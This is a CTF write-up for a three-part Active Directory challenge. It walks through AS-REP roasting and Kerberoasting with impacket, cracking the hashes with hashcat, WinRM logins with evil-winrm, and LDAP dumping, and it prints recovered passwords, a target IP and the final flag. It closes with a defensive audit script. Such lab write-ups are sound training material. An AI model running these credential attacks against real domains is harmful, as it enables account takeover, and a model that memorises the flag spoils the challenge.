CTF-Writeups/Winja CTF 2022/AD Category.md
2022-09-09 17:47:43 +05:00

Blemflarck

This challenge is about Active Directory. We are given three files: `admins.txt`, `hosts` and `nmap.txt`.

`admins.txt` contains a list of usernames.

`nmap.txt` contains the nmap scan results of the domain controller.

`hosts` contains the IP address and domain name of the target.

Now, to start solving this, we have a list of domain usernames and need to verify which of them are valid on the domain; for that we can use kerbrute.

We can try AS-REP roasting using `GetNPUsers.py` from `impacket`: the user `shreya` does not have Kerberos pre-authentication required, so we can request a TGT for that user without providing a valid password.

```bash
GetNPUsers.py vindicators.space/ -usersfile ./admins.txt -request
```

To crack this we can use hashcat with mode `18200`:

```bash
hashcat -a 0 -m 18200 ./hash.txt /usr/share/wordlists/rockyou.txt --force
```

This cracks the hash, giving the password `$anturce77RioGr@ndePR`.

Now that we have credentials, we can log in through WinRM, which is running on port 5985, using `evil-winrm`:

```bash
evil-winrm -i 34.218.188.252 -u 'shreya' -p ''
```

After logging in we can get the flag for this challenge

PhoenixPerson

This challenge is a continuation of the first one. We now have a valid set of credentials, so we can try Kerberoasting: if there is an SPN tied to an account, we can request a TGS for it and crack it offline later.

```bash
GetUserSPNs.py vindicators.space/shreya -request
```

Running hashcat to crack this hash gives the password for the `mirage` user.

Now log in as `mirage`:

```bash
evil-winrm -i 34.218.188.252 -u 'mirage' -p '!@#New_Life87!@#'
```

DAB-389 b

This challenge is the last part of the AD category, where we need to find the third flag as the user `mirage`.

The description references the number 389, which is the port number of LDAP, so we need to enumerate LDAP. There is a tool called `ldapdomaindump` for this:

```bash
ldapdomaindump -u 'mirage' -p '!@#New_Life87!@#' ldap://34.218.188.252
```

This generates HTML files for the users, groups and computers in the domain. Going through `domain_users.html` gives us the first part of the flag.

The second part is found in `domain_computers.html`.

And the third one in `domain_groups.html`.

We can also pull the flag parts out with grep using a regular expression.

Putting the parts together gives the final flag:

`flag{3fe05494a09ac38bb5199698b475c48c_LD4P_3num3r4t10n_FTW_:)}`
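As an added defender-side example (not part of this writeup), the following script audits an LDAP user dump for the two account settings the Blemflarck and PhoenixPerson challenges relied on; the records, domain name and group DNs in it are constructed:

```python
# Added hardening check (example, not code from the writeup): audit domain
# user records for Kerberos pre-authentication disabled (AS-REP roasting)
# and an SPN set on a user account (Kerberoasting). Records are constructed;
# in practice they would come from an LDAP export such as ldapdomaindump's JSON.

UF_ACCOUNTDISABLE = 0x0002          # userAccountControl: account disabled
UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl: no pre-auth needed
PRIVILEGED_GROUPS = ("Domain Admins", "Enterprise Admins", "Administrators")

# Constructed sample records in the shape of an LDAP user dump (hypothetical domain).
SAMPLE_USERS = [
    {"sAMAccountName": "alice", "userAccountControl": 512,
     "servicePrincipalName": [], "memberOf": []},
    {"sAMAccountName": "bob", "userAccountControl": 512 | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "memberOf": []},
    {"sAMAccountName": "svc_sql", "userAccountControl": 66048,
     "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"],
     "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local"]},
    {"sAMAccountName": "old_svc", "userAccountControl": 514,
     "servicePrincipalName": ["HTTP/old.corp.local"], "memberOf": []},
]

def audit_accounts(records):
    """Map each risky sAMAccountName to {"issues": [...], "severity": str}."""
    findings = {}
    for rec in records:
        uac = int(rec.get("userAccountControl", 0))
        if uac & UF_ACCOUNTDISABLE:
            continue  # a disabled account cannot obtain tickets at all
        issues = []
        if uac & UF_DONT_REQUIRE_PREAUTH:
            issues.append("pre-authentication not required (AS-REP roastable)")
        spns = rec.get("servicePrincipalName") or []
        if spns:
            issues.append("SPN on user account (Kerberoastable): " + ", ".join(spns))
        if not issues:
            continue
        # Privileged group membership raises severity: a cracked ticket there is a full compromise.
        groups = rec.get("memberOf") or []
        privileged = any(g in dn for dn in groups for g in PRIVILEGED_GROUPS)
        findings[rec["sAMAccountName"]] = {
            "issues": issues,
            "severity": "high" if privileged else "medium",
        }
    return findings

if __name__ == "__main__":
    for name, f in audit_accounts(SAMPLE_USERS).items():
        print(f"{name}: {f['severity']} - {'; '.join(f['issues'])}")
```

Accounts that show up here should have pre-authentication re-enabled, and service accounts with SPNs should get long random passwords or be migrated to group Managed Service Accounts.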

There were good challenges and a lot of categories, including web3, cloud and source code review, which I haven't done before; due to me doing "real world assessments" I wasn't able to touch the rest of the challenges.